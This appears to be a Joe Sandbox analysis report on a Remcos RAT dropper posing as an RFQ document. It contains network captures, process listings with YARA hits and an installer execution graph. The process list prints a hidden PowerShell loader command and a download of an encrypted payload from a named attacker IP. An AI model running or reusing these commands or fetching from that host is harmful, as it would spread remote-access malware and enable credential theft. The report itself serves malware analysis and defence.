
                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                            Dec 18, 2024 11:04:01.526529074 CET1.1.1.1192.168.2.60xc34fNo error (0)fp2e7a.wpc.2be4.phicdn.netfp2e7a.wpc.phicdn.netCNAME (Canonical name)IN (0x0001)false
                                                            Dec 18, 2024 11:04:01.526529074 CET1.1.1.1192.168.2.60xc34fNo error (0)fp2e7a.wpc.phicdn.net192.229.221.95A (IP address)IN (0x0001)false
                                                            Dec 18, 2024 11:05:17.485385895 CET1.1.1.1192.168.2.60x17dcNo error (0)geoplugin.net178.237.33.50A (IP address)IN (0x0001)false

                                                            HTTP Request Dependency Graph

                                                            • 212.162.149.92
                                                            • geoplugin.net

                                                            HTTP Packets

                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            0192.168.2.649868212.162.149.92804552C:\Windows\SysWOW64\msiexec.exe
                                                            TimestampBytes transferredDirectionData
                                                            Dec 18, 2024 11:05:12.408065081 CET177OUTGET /FbuhjxbSFSc116.bin HTTP/1.1
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                            Host: 212.162.149.92
                                                            Cache-Control: no-cache
                                                            Dec 18, 2024 11:05:13.562342882 CET1236INHTTP/1.1 200 OK
                                                            Content-Type: application/octet-stream
                                                            Last-Modified: Wed, 18 Dec 2024 03:44:39 GMT
                                                            Accept-Ranges: bytes
                                                            ETag: "cc516f2aff50db1:0"
                                                            Server: Microsoft-IIS/8.5
                                                            Date: Wed, 18 Dec 2024 10:05:15 GMT
                                                            Content-Length: 493120
                                                            Data Raw: 94 18 9c de b6 f0 de 51 d4 c5 a5 92 9c 9f 67 cc 54 fb 5c e4 7c 5c a0 2e 7b 14 85 46 00 4e c2 61 15 c9 87 42 39 20 55 43 a1 24 e1 e1 96 c2 a1 1e 0a 49 97 b8 1e 55 a5 e7 14 74 4a 35 4b d9 48 cd a6 09 a3 ef 48 42 22 0f b3 6b 87 ac 60 b3 c2 48 29 4b f2 5d bc 67 d3 35 ff 06 85 f4 cc fc 8e 68 d8 72 d9 27 c0 f8 3c 8f b1 a4 84 88 42 a0 c9 eb eb 95 76 61 d7 01 be 11 ff c1 bc 56 9b 21 c6 54 ca 4e 81 48 8f 77 15 1d 06 35 4c c9 54 63 bc d3 22 0a 7d c8 37 15 77 a3 46 b2 5f b1 2b d2 0e fb 13 b8 33 51 67 75 f1 34 fa 42 97 0e e4 16 43 b2 3a 7a 2e ee 6d 0b bf 33 74 48 c3 88 c0 76 91 d3 61 8d 15 c1 e6 22 20 c7 c2 3e 00 c2 18 ab 9b 6b d5 c4 d3 cb 37 54 22 93 d2 c5 ad c4 cb 4b f8 59 73 ea d2 d0 94 b8 9c 63 57 4a 28 db c9 9c 77 5c 88 46 1f 21 1d 42 36 2e bb 48 e6 45 df c6 a5 91 8f e3 13 0c 0f d2 be c0 3b 93 b5 5a a6 a9 1d a2 e1 04 4b 47 c0 11 ac 5c 25 3a c8 fb 8b f4 fc 6c b3 57 55 b9 98 0c 46 d7 d9 a7 38 23 fe 5d 30 55 b8 da 00 9f 08 1f 50 4d 34 7f 49 0d ba f6 cb 24 1e 0c a1 63 5d 6d 6d a6 2a 15 36 70 38 aa 3b 21 67 8f [TRUNCATED]
                                                            Data Ascii: QgT\|\.{FNaB9 UC$IUtJ5KHHB"k`H)K]g5hr'<BvaV!TNHw5LTc"}7wF_+3Qgu4BC:z.m3tHva" >k7T"KYscWJ(w\F!B6.HE;ZKG\%:lWUF8#]0UPM4I$c]mm*6p8;!g/ng,%f<xK>0|gC_H^NY^4jnAxsoXf01H>}~IL&3{-+'?MT$x=H<:BqPbLKrktA\DZq?#wLJE?xKetfjH2/;oySgI0lX@WYT3"!6v>y{FTD|zi0O5_Y/K=njWtV62J/b`O@;{d&SDLd2)?IX:G3xH152.U){[%Tf<2tR( \7>G1hS/w('?]Nc#6A<&(2F8cGu)2<p/;UQd0H3#}sGq?_C*_:p78Y`g_iN*gkbr?og<IH$(o)PIMdU*L<#Y;*pP9{,|Y(~7
                                                            Dec 18, 2024 11:05:13.562391043 CET1236INData Raw: 79 7d 8e 84 e3 be c8 d8 37 53 b5 0b d3 c8 f4 32 a5 a8 e7 e0 4c e6 dc 00 7f c0 75 10 07 1a a6 10 1a b3 4d 32 8d 09 97 86 e9 e8 9e e5 89 52 0e 7d cd 4c bd b6 23 ab 02 fd bf 5f 1e 24 df a5 a0 2d b6 e7 8f 07 0c 17 36 c6 a9 d6 f9 c8 c8 8f 78 03 24 db
                                                            Data Ascii: y}7S2LuM2R}L#_$-6x$rzCRNS*]eYzu{hxd#!lxk8cMm<fJ;#KLA<r4x~MI>Mx@4>o6"RM+{BQ@y./18{W
                                                            Dec 18, 2024 11:05:13.562407017 CET1236INData Raw: 8e 25 a5 0f c3 77 02 de dd 67 df e7 9f 6f ac 6c 58 aa 10 50 dc 17 94 62 59 2c 68 24 92 58 4b 72 55 2a 90 a0 76 ed 8c 2d 01 9f c8 ca a2 1d d4 1e d6 50 da e2 bc db 81 48 5d 89 ba 0e db 44 20 02 56 f8 f0 1d 0c f8 a0 37 6d d4 36 33 17 36 98 86 80 3e
                                                            Data Ascii: %wgolXPbY,h$XKrU*v-PH]D V7m636>!dn|+d,V^m>+/bKr\]N[DSNMjJcxv3k u=cjLNc)m"Cb,L61V^ BHqKOH6deP
                                                            Dec 18, 2024 11:05:13.562465906 CET1236INData Raw: 9e 9e ad 2c 6a db 84 48 aa d1 33 8e 4f a4 c3 aa 57 18 f5 ae 37 75 f7 ed 86 90 5b 92 1a a4 21 3c a7 eb 8c 03 af e0 2d 9d ec ae 1a db 4c ff 51 72 d8 e4 11 a0 41 1f 04 ea cd 20 5a 44 ec 36 fb 1c 45 67 aa c6 67 ee 61 2b 3f be 46 af 68 ae 46 ed 72 e4
                                                            Data Ascii: ,jH3OW7u[!<-LQrA ZD6Egga+?FhFr]+xO9(;+r@?zxS\JI"q]>o:t.DW#ba{!Nh\B{.Hc'r'MT9N{:"
                                                            Dec 18, 2024 11:05:13.562483072 CET896INData Raw: 20 b5 8e d8 93 c0 d2 01 ab 75 b9 35 48 2d ff 9c 77 c6 91 cc f6 e6 19 52 46 c8 4b f9 50 ca fb d9 38 40 97 ac 76 f6 fc e6 cf a8 3c cc 1b d6 33 10 2b a1 0e 23 60 02 b0 17 29 9a 3c b7 ad 76 40 eb e7 28 8b 8a de 6c 85 e1 b3 92 af 3c f1 e3 75 8a 7d 31
                                                            Data Ascii: u5H-wRFKP8@v<3+#`)<v@(l<u}1:"h*G|u7~UH5HA?<.Wr7w^_*9?=>bVH^/JoKX+PId8#BW[;eM%z/=]3,}[(Qi
                                                            Dec 18, 2024 11:05:13.600733042 CET1236INData Raw: 97 91 e2 c2 d2 d3 e2 e2 7c b9 48 07 14 f7 85 59 a1 fb b0 1a 3d 79 e8 1d 46 41 0e ee 31 2c 5a b7 58 6a a8 cf 85 fa 2e b8 ed 91 07 13 0f 14 09 7b 1a cc 6b 08 d7 14 73 21 fa 1a 3b 2c 81 9b b7 48 a7 18 2c 0a f1 e3 c6 2c c6 bd 30 62 ba 5b a4 66 1e 2d
                                                            Data Ascii: |HY=yFA1,ZXj.{ks!;,H,,0b[f-M^"c!,5~0TPS3n[[fQ#)Ng4/2q)x$ X)7{2!>;HsXzOn\qn
                                                            Dec 18, 2024 11:05:13.600801945 CET1236INData Raw: ec f7 b2 1d 40 03 e9 d4 eb 66 75 96 a4 b3 2a 33 fa f7 d4 f4 c7 b8 48 38 82 18 6b 20 c7 90 fa 51 6c a8 40 93 08 2f 72 0c b5 34 f3 fe 2a 4c cf 65 7a 20 9d 90 12 b0 66 ca 02 f4 a7 75 50 aa 4a 63 d1 cb 39 e3 22 31 02 ad 95 68 83 bb f8 2c a6 5c c7 76
                                                            Data Ascii: @fu*3H8k Ql@/r4*Lez fuPJc9"1h,\vyOG`-KK<flY@orP'rv^BIz5\rg\kCpKAwVN&)6m ^LAJG5?dl0x0DuO
                                                            Dec 18, 2024 11:05:13.600840092 CET1236INData Raw: 75 18 b8 73 a0 76 25 5f dd 32 d2 71 9b a1 01 fd 3e 61 bc f9 eb 69 07 a0 a2 71 3f 89 1a 97 b9 b4 29 29 7a 72 b9 60 2c 9e 65 cf 5f 1c c9 d8 fd 30 72 3f 77 3c a8 33 36 53 7e cc 27 8e 65 8a 5f 6e aa cf 70 1a ba 6b bf 2a 8a 58 54 f4 46 be ae ae 01 55
                                                            Data Ascii: usv%_2q>aiq?))zr`,e_0r?w<36S~'e_npk*XTFUcgJpu&egLEI[vBACLA:z9YofOH4c {-1Hn1" _Ii\BgBxk7L?~+NL33Y7
                                                            Dec 18, 2024 11:05:13.600877047 CET1236INData Raw: d6 cc ea eb 4a 74 0a c0 e0 0b 5c ae 87 39 fe 47 f3 9e ed d3 b0 9e 87 75 9c b6 0e 09 40 7b ce e7 bd 52 84 23 b9 58 ae a2 ab 7f 00 6d a1 ef 51 a5 56 8b 82 a9 b4 b4 63 29 1f b1 5b db 50 3e c1 a1 9b 90 d4 15 cc 71 1f a3 5e 02 47 f6 4a 01 51 57 d4 66
                                                            Data Ascii: Jt\9Gu@{R#XmQVc)[P>q^GJQWf.Ych6@o~'nb<F`PS,iKG.7U+G~4.06%4>g1?g"("h}Oh7*#=8+CpZIE.w)PWO|s(*h2L%
                                                            Dec 18, 2024 11:05:13.600914955 CET1236INData Raw: 0f f8 a2 5e c2 69 c2 77 a2 e1 24 6f 9b 31 86 c1 af 8b a9 78 fe 3c 6d 5c c1 ca 72 46 e1 7f 6c 8d 07 ee a8 95 cc 84 94 4d 95 b9 a1 89 06 95 9e 77 e7 88 e1 57 8e 9c d4 ef b3 a2 89 18 b5 ab 1b 5d 56 b3 31 e8 c5 6c f5 7c 25 d1 77 46 ec c7 bb 1f cc 32
                                                            Data Ascii: ^iw$o1x<m\rFlMwW]V1l|%wF2ORe&NqR5`dxF=LCgT?MJY0`eHRs0u[H%V6yZ;^#A3de3c"t9IH^{,8U^&
                                                            Dec 18, 2024 11:05:13.682140112 CET1236INData Raw: f3 e9 e8 1f 90 4a 4e 6b 15 c7 74 89 8c e9 5a 99 2a f9 f6 48 5c 92 a9 e6 56 fa 41 68 78 62 b6 5a aa 84 0b b4 e5 3f 48 68 77 99 96 17 71 dc f7 e3 c5 24 44 26 f1 7f 13 b4 e4 00 00 4a 80 48 90 4e 7f 3e 0a f1 91 03 ec 20 dc f1 99 47 c4 29 5a fa 09 e9
                                                            Data Ascii: JNktZ*H\VAhxbZ?Hhwq$D&JHN> G)Z9>#72@GGt`<3Wm}Ds-te1ko{=aC,]UAf8Za4(AVy]9U3G2 t


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            1192.168.2.649881178.237.33.50804552C:\Windows\SysWOW64\msiexec.exe
                                                            TimestampBytes transferredDirectionData
                                                            Dec 18, 2024 11:05:17.608278036 CET71OUTGET /json.gp HTTP/1.1
                                                            Host: geoplugin.net
                                                            Cache-Control: no-cache
                                                            Dec 18, 2024 11:05:18.878010988 CET1171INHTTP/1.1 200 OK
                                                            date: Wed, 18 Dec 2024 10:05:18 GMT
                                                            server: Apache
                                                            content-length: 963
                                                            content-type: application/json; charset=utf-8
                                                            cache-control: public, max-age=300
                                                            access-control-allow-origin: *
                                                            Data Raw: 7b 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 71 75 65 73 74 22 3a 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 73 74 61 74 75 73 22 3a 32 30 30 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 64 65 6c 61 79 22 3a 22 31 6d 73 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 72 65 64 69 74 22 3a 22 53 6f 6d 65 20 6f 66 20 74 68 65 20 72 65 74 75 72 6e 65 64 20 64 61 74 61 20 69 6e 63 6c 75 64 65 73 20 47 65 6f 4c 69 74 65 32 20 64 61 74 61 20 63 72 65 61 74 65 64 20 62 79 20 4d 61 78 4d 69 6e 64 2c 20 61 76 61 69 6c 61 62 6c 65 20 66 72 6f 6d 20 3c 61 20 68 72 65 66 3d 27 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 27 3e 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 3c 5c 2f 61 3e 2e 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 69 74 79 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 67 69 6f 6e 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 67 65 [TRUNCATED]
                                                            Data Ascii: { "geoplugin_request":"8.46.123.189", "geoplugin_status":200, "geoplugin_delay":"1ms", "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.", "geoplugin_city":"New York", "geoplugin_region":"New York", "geoplugin_regionCode":"NY", "geoplugin_regionName":"New York", "geoplugin_areaCode":"", "geoplugin_dmaCode":"501", "geoplugin_countryCode":"US", "geoplugin_countryName":"United States", "geoplugin_inEU":0, "geoplugin_euVATrate":false, "geoplugin_continentCode":"NA", "geoplugin_continentName":"North America", "geoplugin_latitude":"40.7503", "geoplugin_longitude":"-74.0014", "geoplugin_locationAccuracyRadius":"20", "geoplugin_timezone":"America\/New_York", "geoplugin_currencyCode":"USD", "geoplugin_currencySymbol":"$", "geoplugin_currencySymbol_UTF8":"$", "geoplugin_currencyConverter":0}


                                                            Statistics

                                                            CPU Usage

                                                            Click to jump to process

                                                            Memory Usage

                                                            Click to jump to process

                                                            High Level Behavior Distribution

                                                            Click to dive into process behavior distribution

                                                            Behavior

                                                            Click to jump to process

                                                            System Behavior

                                                            General

                                                            Target ID:0
                                                            Start time:05:04:03
                                                            Start date:18/12/2024
                                                            Path:C:\Users\user\Desktop\RFQ NO 65-58003.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Users\user\Desktop\RFQ NO 65-58003.exe"
                                                            Imagebase:0x400000
                                                            File size:839'544 bytes
                                                            MD5 hash:E4E7B853E87922FF59BCAE3527B206F9
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:low
                                                            Has exited:true

                                                            General

                                                            Target ID:2
                                                            Start time:05:04:06
                                                            Start date:18/12/2024
                                                            Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:powershell.exe -windowstyle hidden "$Sonnetish=gc -raw 'C:\Users\user\AppData\Roaming\afdragsordning\Rygklapperne.Tis225';$Gastriskes=$Sonnetish.SubString(65822,3);.$Gastriskes($Sonnetish)
                                                            Imagebase:0xce0000
                                                            File size:433'152 bytes
                                                            MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            General

                                                            Target ID:3
                                                            Start time:05:04:06
                                                            Start date:18/12/2024
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff66e660000
                                                            File size:862'208 bytes
                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            General

                                                            Target ID:13
                                                            Start time:05:04:41
                                                            Start date:18/12/2024
                                                            Path:C:\Windows\System32\svchost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                            Imagebase:0x7ff7403e0000
                                                            File size:55'320 bytes
                                                            MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:false

                                                            General

                                                            Target ID:14
                                                            Start time:05:05:03
                                                            Start date:18/12/2024
                                                            Path:C:\Windows\SysWOW64\msiexec.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Windows\SysWOW64\msiexec.exe"
                                                            Imagebase:0x40000
                                                            File size:59'904 bytes
                                                            MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Yara matches:
                                                            • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000E.00000003.2928845396.00000000056FF000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000E.00000003.2898152047.0000000005709000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000E.00000002.3394879441.00000000056CD000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000E.00000003.2928001965.00000000056F7000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000E.00000003.2899931678.0000000005709000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000E.00000002.3394879441.00000000056E5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000E.00000002.3391979783.000000000287F000.00000004.00000010.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000E.00000003.3221293540.0000000005709000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000E.00000002.3394879441.00000000056B5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000E.00000003.2896409361.0000000005709000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000E.00000002.3395028821.0000000005709000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                            Reputation:high
                                                            Has exited:false

                                                            General

                                                            Target ID:16
                                                            Start time:05:05:19
                                                            Start date:18/12/2024
                                                            Path:C:\Windows\SysWOW64\msiexec.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\vucumrgsvevkhhxckfc"
                                                            Imagebase:0x40000
                                                            File size:59'904 bytes
                                                            MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            General

                                                            Target ID:17
                                                            Start time:05:05:19
                                                            Start date:18/12/2024
                                                            Path:C:\Windows\SysWOW64\msiexec.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\vucumrgsvevkhhxckfc"
                                                            Imagebase:0x40000
                                                            File size:59'904 bytes
                                                            MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            General

                                                            Target ID:18
                                                            Start time:05:05:19
                                                            Start date:18/12/2024
                                                            Path:C:\Windows\SysWOW64\msiexec.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\fpinncqmjmnpjnlobqoxqa"
                                                            Imagebase:0x40000
                                                            File size:59'904 bytes
                                                            MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            General

                                                            Target ID:19
                                                            Start time:05:05:19
                                                            Start date:18/12/2024
                                                            Path:C:\Windows\SysWOW64\msiexec.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\fpinncqmjmnpjnlobqoxqa"
                                                            Imagebase:0x40000
                                                            File size:59'904 bytes
                                                            MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            General

                                                            Target ID:20
                                                            Start time:05:05:19
                                                            Start date:18/12/2024
                                                            Path:C:\Windows\SysWOW64\msiexec.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\irnfnubnwufuubhrkbjztnmhqi"
                                                            Imagebase:0x40000
                                                            File size:59'904 bytes
                                                            MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            Disassembly

                                                            Reset < >

                                                              Execution Graph

                                                              Execution Coverage:21.7%
                                                              Dynamic/Decrypted Code Coverage:0%
                                                              Signature Coverage:20.3%
                                                              Total number of Nodes:1344
                                                              Total number of Limit Nodes:29
                                                              execution_graph 3104 4015c1 3123 402c53 3104->3123 3108 401631 3110 401663 3108->3110 3111 401636 3108->3111 3113 401423 25 API calls 3110->3113 3147 401423 3111->3147 3120 40165b 3113->3120 3117 4015d1 3117->3108 3121 401617 GetFileAttributesW 3117->3121 3135 405bf3 3117->3135 3139 4058da 3117->3139 3142 405840 CreateDirectoryW 3117->3142 3151 4058bd CreateDirectoryW 3117->3151 3119 40164a SetCurrentDirectoryW 3119->3120 3121->3117 3124 402c5f 3123->3124 3154 406234 3124->3154 3127 4015c8 3129 405c71 CharNextW CharNextW 3127->3129 3130 405ca0 3129->3130 3131 405c8e 3129->3131 3133 405cc4 3130->3133 3134 405bf3 CharNextW 3130->3134 3131->3130 3132 405c9b CharNextW 3131->3132 3132->3133 3133->3117 3134->3130 3136 405bf9 3135->3136 3137 405c0f 3136->3137 3138 405c00 CharNextW 3136->3138 3137->3117 3138->3136 3189 4065ec GetModuleHandleA 3139->3189 3143 405891 GetLastError 3142->3143 3144 40588d 3142->3144 3143->3144 3145 4058a0 SetFileSecurityW 3143->3145 3144->3117 3145->3144 3146 4058b6 GetLastError 3145->3146 3146->3144 3198 405371 3147->3198 3150 406212 lstrcpynW 3150->3119 3152 4058d1 GetLastError 3151->3152 3153 4058cd 3151->3153 3152->3153 3153->3117 3170 406241 3154->3170 3155 40648c 3156 402c80 3155->3156 3188 406212 lstrcpynW 3155->3188 3156->3127 3172 4064a6 3156->3172 3158 4062f4 GetVersion 3158->3170 3159 40645a lstrlenW 3159->3170 3162 406234 10 API calls 3162->3159 3164 40636f GetSystemDirectoryW 3164->3170 3165 406382 GetWindowsDirectoryW 3165->3170 3166 4064a6 5 API calls 3166->3170 3167 4063b6 SHGetSpecialFolderLocation 3167->3170 3171 4063ce SHGetPathFromIDListW CoTaskMemFree 3167->3171 3168 406234 10 API calls 3168->3170 3169 4063fb lstrcatW 3169->3170 3170->3155 3170->3158 3170->3159 3170->3162 3170->3164 3170->3165 3170->3166 3170->3167 3170->3168 3170->3169 3181 4060df RegOpenKeyExW 3170->3181 3186 406159 wsprintfW 3170->3186 3187 406212 lstrcpynW 3170->3187 3171->3170 3178 4064b3 3172->3178 3173 40652e CharPrevW 3175 406529 3173->3175 3174 40651c CharNextW 3174->3175 3174->3178 3175->3173 3176 40654f 3175->3176 3176->3127 3177 405bf3 CharNextW 3177->3178 3178->3174 3178->3175 3178->3177 3179 406508 CharNextW 3178->3179 3180 406517 CharNextW 3178->3180 3179->3178 3180->3174 3182 406153 3181->3182 3183 406113 RegQueryValueExW 3181->3183 3182->3170 3185 406134 RegCloseKey 3183->3185 3185->3182 3186->3170 3187->3170 3188->3156 3190 406612 GetProcAddress 3189->3190 3191 406608 3189->3191 3193 4058e1 3190->3193 3195 40657c GetSystemDirectoryW 3191->3195 3193->3117 3194 40660e 3194->3190 3194->3193 3196 40659e wsprintfW LoadLibraryExW 3195->3196 3196->3194 3199 40538c 3198->3199 3208 401431 3198->3208 3200 4053a8 lstrlenW 3199->3200 3201 406234 18 API calls 3199->3201 3202 4053d1 3200->3202 3203 4053b6 lstrlenW 3200->3203 3201->3200 3205 4053e4 3202->3205 3206 4053d7 SetWindowTextW 3202->3206 3204 4053c8 lstrcatW 3203->3204 3203->3208 3204->3202 3207 4053ea SendMessageW SendMessageW SendMessageW 3205->3207 3205->3208 3206->3205 3207->3208 3208->3150 3209 401941 3210 401943 3209->3210 3211 402c53 18 API calls 3210->3211 3212 401948 3211->3212 3215 405a03 3212->3215 3251 405cce 3215->3251 3218 405a42 3222 405b62 3218->3222 3265 406212 lstrcpynW 3218->3265 3219 405a2b DeleteFileW 3247 401951 3219->3247 3221 405a68 3223 405a7b 3221->3223 3224 405a6e lstrcatW 3221->3224 3222->3247 3283 406555 FindFirstFileW 3222->3283 3266 405c12 lstrlenW 3223->3266 3227 405a81 3224->3227 3228 405a91 lstrcatW 3227->3228 3230 405a9c lstrlenW FindFirstFileW 3227->3230 3228->3230 3230->3222 3249 405abe 3230->3249 3233 405b45 FindNextFileW 3237 405b5b FindClose 3233->3237 3233->3249 3234 4059bb 5 API calls 3236 405b9d 3234->3236 3238 405ba1 3236->3238 3239 405bb7 3236->3239 3237->3222 3242 405371 25 API calls 3238->3242 3238->3247 3241 405371 25 API calls 3239->3241 3241->3247 3244 405bae 3242->3244 3243 405a03 62 API calls 3243->3249 3246 4060b3 38 API calls 3244->3246 3245 405371 25 API calls 3245->3233 3246->3247 3248 405371 25 API calls 3248->3249 3249->3233 3249->3243 3249->3245 3249->3248 3270 406212 lstrcpynW 3249->3270 3271 4059bb 3249->3271 3279 4060b3 MoveFileExW 3249->3279 3289 406212 lstrcpynW 3251->3289 3253 405cdf 3254 405c71 4 API calls 3253->3254 3255 405ce5 3254->3255 3256 405a23 3255->3256 3257 4064a6 5 API calls 3255->3257 3256->3218 3256->3219 3263 405cf5 3257->3263 3258 405d26 lstrlenW 3259 405d31 3258->3259 3258->3263 3261 405bc6 3 API calls 3259->3261 3260 406555 2 API calls 3260->3263 3262 405d36 GetFileAttributesW 3261->3262 3262->3256 3263->3256 3263->3258 3263->3260 3264 405c12 2 API calls 3263->3264 3264->3258 3265->3221 3267 405c20 3266->3267 3268 405c32 3267->3268 3269 405c26 CharPrevW 3267->3269 3268->3227 3269->3267 3269->3268 3270->3249 3290 405dc2 GetFileAttributesW 3271->3290 3273 4059e8 3273->3249 3275 4059d6 RemoveDirectoryW 3277 4059e4 3275->3277 3276 4059de DeleteFileW 3276->3277 3277->3273 3278 4059f4 SetFileAttributesW 3277->3278 3278->3273 3280 4060d4 3279->3280 3281 4060c7 3279->3281 3280->3249 3293 405f41 lstrcpyW 3281->3293 3284 405b87 3283->3284 3285 40656b FindClose 3283->3285 3284->3247 3286 405bc6 lstrlenW CharPrevW 3284->3286 3285->3284 3287 405be2 lstrcatW 3286->3287 3288 405b91 3286->3288 3287->3288 3288->3234 3289->3253 3291 4059c7 3290->3291 3292 405dd4 SetFileAttributesW 3290->3292 3291->3273 3291->3275 3291->3276 3292->3291 3294 405f69 3293->3294 3295 405f8f GetShortPathNameW 3293->3295 3320 405de7 GetFileAttributesW CreateFileW 3294->3320 3297 405fa4 3295->3297 3298 4060ae 3295->3298 3297->3298 3300 405fac wsprintfA 3297->3300 3298->3280 3299 405f73 CloseHandle GetShortPathNameW 3299->3298 3301 405f87 3299->3301 3302 406234 18 API calls 3300->3302 3301->3295 3301->3298 3303 405fd4 3302->3303 3321 405de7 GetFileAttributesW CreateFileW 3303->3321 3305 405fe1 3305->3298 3306 405ff0 GetFileSize GlobalAlloc 3305->3306 3307 406012 3306->3307 3308 4060a7 CloseHandle 3306->3308 3322 405e6a ReadFile 3307->3322 3308->3298 3313 406031 lstrcpyA 3318 406053 3313->3318 3314 406045 3315 405d4c 4 API calls 3314->3315 3315->3318 3316 40608a SetFilePointer 3329 405e99 WriteFile 3316->3329 3318->3316 3320->3299 3321->3305 3323 405e88 3322->3323 3323->3308 3324 405d4c lstrlenA 3323->3324 3325 405d8d lstrlenA 3324->3325 3326 405d66 lstrcmpiA 3325->3326 3328 405d95 3325->3328 3327 405d84 CharNextA 3326->3327 3326->3328 3327->3325 3328->3313 3328->3314 3330 405eb7 GlobalFree 3329->3330 3330->3308 3927 401e43 3928 402c31 18 API calls 3927->3928 3929 401e49 3928->3929 3930 402c31 18 API calls 3929->3930 3931 401e55 3930->3931 3932 401e61 ShowWindow 3931->3932 3933 401e6c EnableWindow 3931->3933 3934 402adb 3932->3934 3933->3934 3935 4028c3 3936 